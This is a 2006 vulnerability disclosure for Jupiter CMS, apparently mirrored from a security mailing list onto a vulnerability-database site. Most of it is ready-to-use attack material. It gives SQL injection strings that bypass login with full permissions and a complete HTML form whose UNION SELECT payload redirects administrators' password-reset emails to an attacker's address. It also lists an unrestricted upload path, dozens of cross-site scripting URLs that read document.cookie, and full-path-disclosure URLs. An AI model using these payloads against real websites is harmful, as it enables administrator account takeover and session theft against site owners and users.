Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14301
HistorySep 18, 2006 - 12:00 a.m.

Jupiter CMS Multiple injections

2006-09-1800:00:00
vulners.com
26
JSON

Hello,

Jupiter CMS Sql injections ,full path and xss vulnerabilities

Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : [email protected]

if magic_quotes_gpc = off
login with
user name :
' or id=1/*
or
' or authorization = 4/*

you will be loged in with full permission

index.php?n=modules/register&a=3&d=3&key='%20or%20id=1/*
You will be able to change the password for any user … know his id and put it in the url.


or you can use this form by changing http://localhost/jupiter/ to the website dir to recive reset password email to all the administrators

<form method="post" action="http://localhost/jupiter/index.php?n=modules/register&quot;&gt;
<table class="main" cellspacing="1" cellpadding="4" width="100%">
<tr class="head">
<td colspan="2" class="head">Forgot your password?</td>
</tr>
<tr>
<td class="con1" width="42%" valign="middle"><span class="hilight">Username:</span></td>
<td class="con1" width="58%" valign="bottom"><input type="text" name="fpwusername" style="width:100%" class="box" tabindex="5" value="' union select id,authorization ,username ,password ,'[email protected]',url,age,flag,location,registered,lastvisit,forum_lastvisit,ip,forumposts,signature,aboutme,msn,yahoo,icq,aim,skype,avatar,hideemail,templates,calendarbday,status,multikey,actime from users where id=1or authorization=4/*"></td>
</tr>
<tr>
<td class="con1"><input type="button" style="width:100" class="box" value="Back" onClick="window.history.go(-1);" tabindex="8"></td>
<td class="con1" align="right"><input type="submit" style="width:100" class="box" value="Submit" tabindex="7"></td>
</tr>
<input type="hidden" name="a" value="3">
<input type="hidden" name="d" value="1">
</table>
</form>

put the user name value
Change [email protected] to your email
' union select id,authorization ,username ,password ,'[email protected]',url,age,flag,location,registered,lastvisit,forum_lastvisit,ip,forumposts,signature,aboutme,msn,yahoo,icq,aim,skype,avatar,hideemail,templates,calendarbday,status,multikey,actime from users where id=1or authorization=4/*
/********************************************/

Upload any picture to their gallery

modules/galleryuploadfunction.php

picture path will be
gallery/albums/public/name.ext
/********************************************/

xss (Cross site scripting)

modules/blocks.php?is_webmaster=2&language[Admin%20name]=<script>alert(document.cookie);</script>
modules/blocks.php?is_webmaster=2&language[Admin%20back]=<script>alert(document.cookie);</script>

modules/register.php?is_guest=1&language[Register%20title]=<script>alert(document.cookie);</script>
modules/register.php?is_guest=1&language[Register%20title2]=<script>alert(document.cookie);</script>

modules/mass-email.php?language[Mass-Email%20form%20title]=<script>alert(document.cookie);</script>
modules/mass-email.php?language[Mass-Email%20form%20desc]=<script>alert(document.cookie);</script>
modules/mass-email.php?language[Mass-Email%20form%20desc2]=<script>alert(document.cookie);</script>
change the value for language[Mass-Email%20form%20desc(2-4)]

modules/register.php?is_guest=1&a=3&language[Forgotten%20title]=<script>alert(document.cookie);</script>
modules/register.php?is_guest=1&a=3&language[Forgotten%20desc]=<script>alert(document.cookie);</script>
modules/register.php?is_guest=1&a=3&language[Forgotten%20desc2]=<script>alert(document.cookie);</script>
change the var value for language[Forgotten%20desc(2 - 5)]

modules/search.php?language[Search%20view%20desc]=<script>alert(document.cookie);</script>
modules/search.php?language[Search%20view%20desc2]=<script>alert(document.cookie);</script>
Change the value for language[Search%20view%20desc(2-8)]

/********************************************/

Full path
includes/functions.php

modules/register.php?is_guest=1
modules/online.php
modules/poll.php
modules/panel.php
modules/pm.php
modules/news.php
modules/templates_change.php
modules/users.php
modules/misc.php?a=1&is_webmaster=1
modules/masspm.php
modules/mass-email.php?subject_choice=1&message_choice=1&a=1
modules/main-nav.php
modules/login.php
modules/layout.php?is_webmaster=2
modules/hq.php
modules/forum.php
modules/forum-admin.php?n=modules/forum-admin&a=1
modules/events.php
modules/emoticons.php
modules/download.php
modules/blocks.php?is_webmaster=2
modules/ban.php
modules/badwords.php
modules/ads.php
modules/admin.php

/********************************************/

WwW.SoQoR.NeT

JSON